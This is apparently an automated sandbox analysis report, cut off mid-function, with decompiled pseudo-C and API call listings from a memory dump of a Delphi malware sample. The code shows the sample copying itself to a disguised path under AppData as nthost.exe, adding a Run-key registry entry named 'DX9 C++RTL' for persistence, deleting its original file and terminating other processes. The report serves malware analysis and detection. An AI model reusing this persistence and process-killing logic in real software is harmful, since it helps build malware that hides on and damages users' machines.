    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 004050CC, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 98
    C-Code - Quality: 61%
    			E004050CC() {
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				char* _t51;
				void* _t52;
				struct HINSTANCE__* _t59;
				void* _t61;

				_push(0x105);
				_push( *((intOrPtr*)(_t61 - 4)));
				_push(_t61 - 0x11d);
				L00401248();
				GetLocaleInfoA(GetThreadLocale(), 3, _t61 - 0xd, 5); // executed
				_t59 = 0;
				if( *(_t61 - 0x11d) == 0 ||  *(_t61 - 0xd) == 0 &&  *((char*)(_t61 - 0x12)) == 0) {
					L14:
					return _t59;
				} else {
					_t28 = _t61 - 0x11d;
					_push(_t28);
					L00401250();
					_t51 = _t28 + _t61 - 0x11d;
					L5:
					if( *_t51 != 0x2e && _t51 != _t61 - 0x11d) {
						_t51 = _t51 - 1;
						goto L5;
					}
					_t30 = _t61 - 0x11d;
					if(_t51 != _t30) {
						_t52 = _t51 + 1;
						if( *((char*)(_t61 - 0x12)) != 0) {
							_push(0x105 - _t52 - _t30);
							_push(_t61 - 0x12);
							_push(_t52);
							L00401248();
							_t59 = LoadLibraryExA(_t61 - 0x11d, 0, 2);
						}
						if(_t59 == 0 &&  *(_t61 - 0xd) != 0) {
							_push(0x105 - _t52 - _t61 - 0x11d);
							_push(_t61 - 0xd);
							_push(_t52);
							L00401248();
							_t36 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
							_t59 = _t36;
							if(_t59 == 0) {
								 *((char*)(_t61 - 0xb)) = 0;
								_push(0x105 - _t52 - _t61 - 0x11d);
								_push(_t61 - 0xd);
								_push(_t52);
								L00401248();
								_t42 = LoadLibraryExA(_t61 - 0x11d, 0, 2); // executed
								_t59 = _t42;
							}
						}
					}
					goto L14;
				}
			}











    0x004050cc
    0x004050d4
    0x004050db
    0x004050dc
    0x004050ef
    0x004050f4
    0x004050fd
    0x004051e6
    0x004051ed
    0x00405113
    0x00405113
    0x00405119
    0x0040511a
    0x00405127
    0x0040512c
    0x0040512f
    0x0040512b
    0x00000000
    0x0040512b
    0x0040513b
    0x00405143
    0x00405149
    0x0040514e
    0x0040515b
    0x0040515f
    0x00405160
    0x00405161
    0x00405176
    0x00405176
    0x0040517a
    0x00405193
    0x00405197
    0x00405198
    0x00405199
    0x004051a9
    0x004051ae
    0x004051b2
    0x004051b4
    0x004051c9
    0x004051cd
    0x004051ce
    0x004051cf
    0x004051df
    0x004051e4
    0x004051e4
    0x004051b2
    0x0040517a
    0x00000000
    0x00405143

    APIs
    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 004050DC
    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 004050E9
    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 004050EF
    • lstrlen.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 0040511A
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405161
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405171
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405199
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 004051A9
    • lstrcpyn.KERNEL32(00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 004051CF
    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000000,?,00000105,?,00000000,00000002,00000000,?,00000105,?,00000000,00000003,?), ref: 004051DF
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00418750, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 164
    C-Code - Quality: 33%
    			E00418750(void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				intOrPtr _v48;
				char _v52;
				int _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char* _t52;
				void* _t80;
				char* _t87;
				char* _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t125;
				intOrPtr _t139;
				intOrPtr _t140;

				_t137 = __esi;
				_t136 = __edi;
				_t139 = _t140;
				_t110 = 8;
				do {
					_push(0);
					_push(0);
					_t110 = _t110 - 1;
				} while (_t110 != 0);
				_push(_t110);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t139);
				_push(0x418974);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				if(E00402944(__ebx, __esi) == 0) {
					E004029A4(0,  &_v12);
					ShellExecuteA(0, 0, E00404348(_v12), 0x418984, 0, 0);
					E00403D1C();
				}
				_push(_t139);
				_push(0x418925);
				_push( *[fs:eax]);
				 *[fs:eax] = _t140;
				E004029A4(1,  &_v16);
				_t109 = E00407138(_v16, 0);
				_t144 = _t109 - 0x10;
				if(_t109 == 0x10) {
					E00417D84("%appdata%\\Microsoft\\DirectX\\nthost.exe", _t109, _t110,  &_v8, _t136, _t137, _t144);
					E004186D0(_v8, _t109, _t110, _t144);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v24);
					E00417D84(_v24, _t109, _t110,  &_v20, _t136, _t137, _t144);
					_push(_v20);
					E00406EFC("DX9 C++RTL",  &_v28);
					_pop(_t125);
					E004185E8(_v28, _t109, _t125);
					E004029A4(0,  &_v36);
					E00406EFC(_v36,  &_v32);
					_push(_v32);
					E00406EFC("%appdata%\\Microsoft\\DirectX\\nthost.exe",  &_v44);
					E00417D84(_v44, _t109, _t110,  &_v40, _t136, _t137, 0);
					_pop(_t80);
					E00404294(_t80, _v40);
					if(0 == 0) {
						__eflags = 1;
						E00406FFC( &_v60);
						_t87 = E00404348(_v60);
						ShellExecuteA(0, 0, E00404348(_v8), _t87, 0, 1);
					} else {
						_push(1);
						_push(0);
						E00406FFC( &_v52);
						_push(_v52);
						_push(" DEL \"");
						E004029A4(0,  &_v56);
						E00404208();
						_t99 = E00404348(_v48);
						ShellExecuteA(0, 0, E00404348(_v8), _t99, E004189E4, _v56);
					}
					E00403D1C();
				}
				if(_t109 < 0x20) {
					E00406FFC( &_v64);
					_t52 = E00404348(_v64);
					E004029A4(0,  &_v68);
					ShellExecuteA(0, 0, E00404348(_v68), _t52, 0, 1); // executed
					E00403D1C();
				}
				_pop(_t116);
				 *[fs:eax] = _t116;
				_pop(_t117);
				 *[fs:eax] = _t117;
				_push(E0041897B);
				return E00403EAC( &_v72, 0x11);
			}































    0x00418750
    0x00418750
    0x00418751
    0x00418753
    0x00418758
    0x00418758
    0x0041875a
    0x0041875c
    0x0041875c
    0x0041875f
    0x00418760
    0x00418761
    0x00418762
    0x00418765
    0x00418766
    0x0041876b
    0x0041876e
    0x00418778
    0x00418788
    0x0041879a
    0x0041879f
    0x0041879f
    0x004187a6
    0x004187a7
    0x004187ac
    0x004187af
    0x004187ba
    0x004187c7
    0x004187c9
    0x004187cc
    0x004187da
    0x004187e2
    0x004187ef
    0x004187fa
    0x00418802
    0x0041880b
    0x00418813
    0x00418814
    0x0041881e
    0x00418829
    0x00418831
    0x0041883a
    0x00418845
    0x0041884d
    0x0041884e
    0x00418853
    0x004188b5
    0x004188b6
    0x004188be
    0x004188d1
    0x00418855
    0x00418855
    0x00418857
    0x00418861
    0x00418866
    0x00418869
    0x00418873
    0x00418888
    0x00418890
    0x004188a3
    0x004188a3
    0x004188d6
    0x004188d6
    0x004188de
    0x004188ec
    0x004188f4
    0x004188ff
    0x00418911
    0x00418916
    0x00418916
    0x0041891d
    0x00418920
    0x0041895b
    0x0041895e
    0x00418961
    0x00418973

    APIs
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
    • ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00403D1C: FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
      • Part of subcall function 00403D1C: ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000,00418925,?,00000000), ref: 00417DAA
      • Part of subcall function 00417D84: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00417DFA,?,?,?,00000000,00000000,?,004187DF,00000000), ref: 00417DCB
      • Part of subcall function 004186D0: CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00418723
      • Part of subcall function 004185E8: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
      • Part of subcall function 004185E8: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
      • Part of subcall function 004185E8: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 004019B0, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 48
    C-Code - Quality: 68%
    			E004019B0() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E00401A66);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x4545c4);
				L00401304();
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L0040130C();
				}
				E00401374(0x4545e4);
				E00401374(0x4545f4);
				E00401374(0x454620);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x45461c = _t11;
				if( *0x45461c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x45461c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x454608)) = 0x454604;
					 *0x454604 = 0x454604;
					 *0x454610 = 0x454604;
					 *0x4545bc = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(E00401A6D);
				if( *0x454045 != 0) {
					_push(0x4545c4);
					L00401314();
					return 0;
				}
				return 0;
			}








    0x004019b5
    0x004019b6
    0x004019bb
    0x004019be
    0x004019c1
    0x004019c6
    0x004019d2
    0x004019d4
    0x004019d9
    0x004019d9
    0x004019e3
    0x004019ed
    0x004019f7
    0x00401a03
    0x00401a08
    0x00401a14
    0x00401a16
    0x00401a1b
    0x00401a1b
    0x00401a23
    0x00401a27
    0x00401a28
    0x00401a34
    0x00401a37
    0x00401a39
    0x00401a3e
    0x00401a3e
    0x00401a47
    0x00401a4a
    0x00401a4d
    0x00401a59
    0x00401a5b
    0x00401a60
    0x00000000
    0x00401a60
    0x00401a65

    APIs
    • RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
    • RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
    • LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00418C78, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
    C-Code - Quality: 85%
    			_entry_() {
				char _v24;
				char _v28;
				void* _t17;
				void* _t21;
				void* _t32;
				void* _t33;
				void* _t38;
				void* _t39;
				intOrPtr _t41;
				void* _t42;

				_v28 = 0;
				_v24 = 0;
				E00405ADC(0x418be0);
				_push(0x418d7b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_push(_t40);
				_push(0x418d4a);
				_push( *[fs:edx]);
				 *[fs:edx] = _t41;
				_t42 = E00402944(_t32, _t39) - 2;
				if(_t42 > 0) {
					E004029A4(2,  &_v24);
					E00404294(_v24, 0x418d94);
					if(_t42 == 0) {
						E004029A4(3,  &_v28);
						DeleteFileA(E00404348(_v28)); // executed
					}
				}
				E00418750(_t32, _t38, _t39); // executed
				E00418A14(_t32, _t38, _t39);
				E00418540(_t33);
				E00418B90(_t33);
				while(1) {
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
					if(_t17 == 0) {
						continue;
					}
					L5:
					E00418590(_t43);
					while(E00418570() != 0) {
						E004189E8();
						Sleep(0x32);
					}
					_t21 =  *0x454a64; // 0x0
					ResumeThread(_t21);
					do {
						goto L4;
					} while (_t17 == 0);
					goto L5;
					L4:
					E004189E8();
					Sleep(0x32);
					_t17 = E00418570();
					_t43 = _t17;
				}
			}













    0x00418c83
    0x00418c86
    0x00418c8e
    0x00418c96
    0x00418c9b
    0x00418c9e
    0x00418ca3
    0x00418ca4
    0x00418ca9
    0x00418cac
    0x00418cb4
    0x00418cb7
    0x00418cc1
    0x00418cce
    0x00418cd3
    0x00418cdd
    0x00418ceb
    0x00418ceb
    0x00418cd3
    0x00418cf0
    0x00418cf5
    0x00418cfa
    0x00418cff
    0x00418d04
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d17
    0x00000000
    0x00000000
    0x00418d19
    0x00418d19
    0x00418d2c
    0x00418d20
    0x00418d27
    0x00418d27
    0x00418d35
    0x00418d3b
    0x00418d04
    0x00000000
    0x00000000
    0x00000000
    0x00418d04
    0x00418d04
    0x00418d0b
    0x00418d10
    0x00418d15
    0x00418d15

    APIs
      • Part of subcall function 00405ADC: GetModuleHandleA.KERNEL32(00000000,?,00418C93), ref: 00405AE8
      • Part of subcall function 00402944: GetCommandLineA.KERNEL32(00000000,00402995,?,?,?,00000000,?,00418CB4,00000000,00418D4A,?,00000000,00418D7B), ref: 0040295B
    • DeleteFileA.KERNEL32(00000000,00000000,00418D4A,?,00000000,00418D7B), ref: 00418CEB
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00418984,00000000,00000000), ref: 0041879A
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,004189E4,00000000), ref: 004188A3
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 004188D1
      • Part of subcall function 00418750: ShellExecuteA.SHELL32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00418911
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
      • Part of subcall function 004189E8: PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000001), ref: 004189FA
      • Part of subcall function 004189E8: TranslateMessage.USER32 ref: 00418A04
      • Part of subcall function 004189E8: DispatchMessageA.USER32 ref: 00418A0A
    • Sleep.KERNEL32(00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D0B
      • Part of subcall function 00418590: SuspendThread.KERNEL32(00000000,00000000,004185B9,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185AA
      • Part of subcall function 00418590: OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 004185D8
      • Part of subcall function 00418590: TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,?,00418D1E,00000032,00000000,00418D4A,?,00000000), ref: 004185DE
    • Sleep.KERNEL32(00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D27
    • ResumeThread.KERNEL32(00000000,00000032,00000032,00000000,00418D4A,?,00000000,00418D7B), ref: 00418D3B
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00417974, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11
    C-Code - Quality: 68%
    			E00417974(void* __eax) {
				void* _t3;

				_push(0x454880);
				_push(0x101); // executed
				L0040C510(); // executed
				if(__eax != 0) {
					_t3 = E0040A56C("WSAStartup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x00417974
    0x00417979
    0x0041797e
    0x00417985
    0x00417993
    0x00417998
    0x00000000
    0x00417998
    0x0041799d

    APIs
    • WSAStartup.WSOCK32(00000101,00454880), ref: 0041797E
    Strings
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 0040209C, Relevance: 3.1, APIs: 2, Instructions: 124
    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00402218), ref: 004020E7
    • RtlLeaveCriticalSection.KERNEL32(004545C4,0040221F), ref: 00402212
      • Part of subcall function 004019B0: RtlInitializeCriticalSection.KERNEL32(004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019C6
      • Part of subcall function 004019B0: RtlEnterCriticalSection.KERNEL32(004545C4,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 004019D9
      • Part of subcall function 004019B0: LocalAlloc.KERNEL32(00000000,00000FF8,004545C4,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A03
      • Part of subcall function 004019B0: RtlLeaveCriticalSection.KERNEL32(004545C4,00401A6D,00000000,00401A66,?,?,0040224A,00454604,00000000,00000000,?,?,00401C39,00401C4E,00401D9F), ref: 00401A60
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00403D1C, Relevance: 3.1, APIs: 2, Instructions: 71
    C-Code - Quality: 79%
    			E00403D1C() {
				struct HINSTANCE__* _t24;
				void* _t32;
				intOrPtr _t35;
				void* _t45;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L3:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t32);
						 *0x419004 = 0;
					}
					L5:
					while(1) {
						if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
							 *0x0045463C = 0;
						}
						E00403AB8();
						if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
							_t14 =  *0x00454640;
							if( *0x00454640 != 0) {
								E0040532C(_t14);
								_t35 =  *((intOrPtr*)(0x454640));
								_t7 = _t35 + 0x10; // 0x400000
								_t24 =  *_t7;
								_t8 = _t35 + 4; // 0x400000
								if(_t24 !=  *_t8 && _t24 != 0) {
									FreeLibrary(_t24);
								}
							}
						}
						E00403A90();
						if( *((char*)(0x454658)) == 1) {
							 *0x00454654();
						}
						if( *((char*)(0x454658)) != 0) {
							E00403C60();
						}
						if( *0x454630 == 0) {
							if( *0x454024 != 0) {
								 *0x454024();
							}
							ExitProcess( *0x419000); // executed
						}
						memcpy(0x454630,  *0x454630, 0xb << 2);
						_t45 = _t45 + 0xc;
						0x419000 = 0x419000;
					}
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L3;
				}
			}







    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00000000
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00403de9
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00403D14, Relevance: 3.1, APIs: 2, Instructions: 66
    C-Code - Quality: 79%
    			E00403D14() {
				intOrPtr* _t13;
				struct HINSTANCE__* _t27;
				void* _t36;
				intOrPtr _t39;
				void* _t52;

				 *((intOrPtr*)(_t13 +  *_t13)) =  *((intOrPtr*)(_t13 +  *_t13)) + _t13 +  *_t13;
				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L5:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t36);
						 *0x419004 = 0;
					}
					L7:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
					E00403AB8();
					if( *((char*)(0x454658)) <= 1 ||  *0x419000 != 0) {
						_t17 =  *0x00454640;
						if( *0x00454640 != 0) {
							E0040532C(_t17);
							_t39 =  *((intOrPtr*)(0x454640));
							_t7 = _t39 + 0x10; // 0x400000
							_t27 =  *_t7;
							_t8 = _t39 + 4; // 0x400000
							if(_t27 !=  *_t8 && _t27 != 0) {
								FreeLibrary(_t27);
							}
						}
					}
					E00403A90();
					if( *((char*)(0x454658)) == 1) {
						 *0x00454654();
					}
					if( *((char*)(0x454658)) != 0) {
						E00403C60();
					}
					if( *0x454630 == 0) {
						if( *0x454024 != 0) {
							 *0x454024();
						}
						ExitProcess( *0x419000); // executed
					}
					memcpy(0x454630,  *0x454630, 0xb << 2);
					_t52 = _t52 + 0xc;
					0x419000 = 0x419000;
					goto L7;
				} else {
					do {
						 *0x454040 = 0;
						 *((intOrPtr*)( *0x454040))();
					} while ( *0x454040 != 0);
					goto L5;
				}
			}








    0x00403d16
    0x00403d33
    0x00403d4b
    0x00403d52
    0x00403d54
    0x00403d59
    0x00403d60
    0x00403d60
    0x00403d65
    0x00403d69
    0x00403d72
    0x00403d72
    0x00403d75
    0x00403d7e
    0x00403d85
    0x00403d8a
    0x00403d8c
    0x00403d91
    0x00403d94
    0x00403d94
    0x00403d97
    0x00403d9a
    0x00403da1
    0x00403da1
    0x00403d9a
    0x00403d8a
    0x00403da6
    0x00403daf
    0x00403db1
    0x00403db1
    0x00403db8
    0x00403dba
    0x00403dba
    0x00403dc2
    0x00403dcb
    0x00403dcd
    0x00403dcd
    0x00403dd6
    0x00403dd6
    0x00403de7
    0x00403de7
    0x00403de9
    0x00000000
    0x00403d3a
    0x00403d3a
    0x00403d40
    0x00403d44
    0x00403d46
    0x00000000
    0x00403d3a

    APIs
    • ExitProcess.KERNEL32(00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968,00000000,00402995), ref: 00403DD6
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
      • Part of subcall function 00403C90: GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
      • Part of subcall function 00403C90: WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
      • Part of subcall function 00403C90: MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    • FreeLibrary.KERNEL32(00400000,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000,004026A8,?,?,00000000,?,00402968), ref: 00403DA1
    Memory Dump Source
    • Source File: 00000016.00000002.1566647039.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_22_2_400000_obtG43AWHP.jbxd
    Function 00403D18, Relevance: 3.1, APIs: 2, Instructions: 64
    C-Code - Quality: 79%
    			E00403D18() {
				struct HINSTANCE__* _t26;
				void* _t35;
				intOrPtr _t38;
				void* _t51;

				if( *0x00454658 != 0 ||  *0x454040 == 0) {
					L4:
					if( *0x419004 != 0) {
						E00403C04();
						E00403C90(_t35);
						 *0x419004 = 0;
					}
					L6:
					if( *((char*)(0x454658)) == 2 &&  *0x419000 == 0) {
						 *0x0045463C = 0;
					}
